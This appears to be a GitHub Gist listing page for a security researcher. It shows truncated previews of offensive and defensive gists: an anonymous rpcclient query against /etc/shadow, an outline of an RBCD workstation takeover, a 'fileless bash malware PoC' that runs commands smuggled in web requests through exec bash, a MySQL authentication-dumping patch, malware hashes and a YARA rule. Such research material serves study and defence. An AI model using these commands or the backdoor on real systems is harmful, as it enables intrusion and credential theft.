Tim Brown timb-machine
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ dig any wearekuiper.com | |
| ; <<>> DiG 9.10.6 <<>> any wearekuiper.com | |
| ;; global options: +cmd | |
| ;; Got answer: | |
| ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 11921 | |
| ;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 13 | |
| ;; OPT PSEUDOSECTION: | |
| ; EDNS: version: 0, flags:; udp: 4000 |
timb-machine
/ macOS-IR-Forensics.md
Created
August 3, 2021 08:24
— forked from 0xmachos/macOS-IR-Forensics.md
If someone wants to learn MacOS IR/forensics what’s the best resource for that?
timb-machine
/ Yo Samba, what files do you have?
Last active
September 19, 2022 18:25
Yo Samba, what files do you have?
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ echo netfilegetsec 'IPC$' /etc/shadow | rpcclient -U '%' 10.10.10.3 | |
| revision: 1 | |
| type: 0x9004: SEC_DESC_DACL_PRESENT SEC_DESC_DACL_PROTECTED SEC_DESC_SELF_RELATIVE | |
| DACL | |
| ACL Num ACEs: 3 revision: 2 | |
| --- | |
| ACE | |
| type: ACCESS ALLOWED (0) flags: 0x00 | |
| Specific bits: 0x1ff | |
| Permissions: 0x1e01ff: SYNCHRONIZE_ACCESS WRITE_OWNER_ACCESS WRITE_DAC_ACCESS READ_CONTROL_ACCESS |
timb-machine
/ Workstation-Takeover.md
Created
July 26, 2021 09:13
— forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
timb-machine
/ JavascriptRecon.md
Created
July 25, 2021 17:24
My Javascript Recon Process - BugBounty
timb-machine
/ dump-authentication-state.patch
Created
July 21, 2021 13:25
dump-authentication-state.patch
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Description: Dump the authentication state to understand the hashing algorithms | |
| Dump the authentication state to understand the hashing algorithms. | |
| Specifically, caching_sha2_password and mysql_native_password. | |
| . | |
| mysql-8.0 (8.0.23-0ubuntu0.20.04.1) focal-security; urgency=medium | |
| . | |
| * SECURITY UPDATE: Update to 8.0.23 to fix security issues | |
| - CVE-2021-2002, CVE-2021-2010, CVE-2021-2011, CVE-2021-2021, | |
| CVE-2021-2022, CVE-2021-2024, CVE-2021-2031, CVE-2021-2032, | |
| CVE-2021-2036, CVE-2021-2038, CVE-2021-2046, CVE-2021-2048, |
timb-machine
/ Windows command line gui access.md
Created
July 12, 2021 06:17
— forked from scotgabriel/Windows command line gui access.md
Common windows functions via rundll user32 and control panel
timb-machine
/ Fileless bash malware PoC
Last active
September 19, 2022 18:26
Fileless bash malware PoC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ echo "while :; do grep "BAH~" /var/log/apache2/interesting.log | cut -f 2 -d \"~\" | tr '_' ' '; done" | exec bash | |
| $ wget --no-check-certificate 'https://interesting/?BAH~touch_/tmp/foo~' | |
| root 10680 10679 0 21:27 pts/1 00:00:00 /bin/bash | |
| root 11125 10680 17 21:27 pts/1 00:00:02 bash | |
| $ ls /proc/11125/fd | |
| total 0 | |
| dr-x------ 2 root root 0 Jun 28 21:27 . |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| aix 10ac312c8dd02e417dd24d53c99525c29d74dcbc84730351ad7a4e0a4b1a0eba.xcoff | |
| aix 3a5ba44f140821849de2d82d5a137c3bb5a736130dddb86b296d94e6b421594c.xcoff | |
| aix ca9ab48d293cc84092e8db8f0ca99cb155b30c61d32a1da7cd3687de454fe86c.xcoff | |
| aix d465637518024262c063f4a82d799a4e40ff3381014972f24ea18bc23c3b27ee.xcoff | |
| enterpriseunix2 10ac312c8dd02e417dd24d53c99525c29d74dcbc84730351ad7a4e0a4b1a0eba.xcoff | |
| enterpriseunix2 3a5ba44f140821849de2d82d5a137c3bb5a736130dddb86b296d94e6b421594c.xcoff | |
| enterpriseunix2 ca9ab48d293cc84092e8db8f0ca99cb155b30c61d32a1da7cd3687de454fe86c.xcoff | |
| enterpriseunix2 d465637518024262c063f4a82d799a4e40ff3381014972f24ea18bc23c3b27ee.xcoff |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import "elf" | |
| rule enterpriseapps2 { | |
| meta: | |
| author = "Tim Brown @timb_machine" | |
| description = "Enterprise apps" | |
| strings: | |
| $db2 = "db2" nocase | |
| $oracle = "oracle" nocase | |
| $mysql = "mysql" nocase |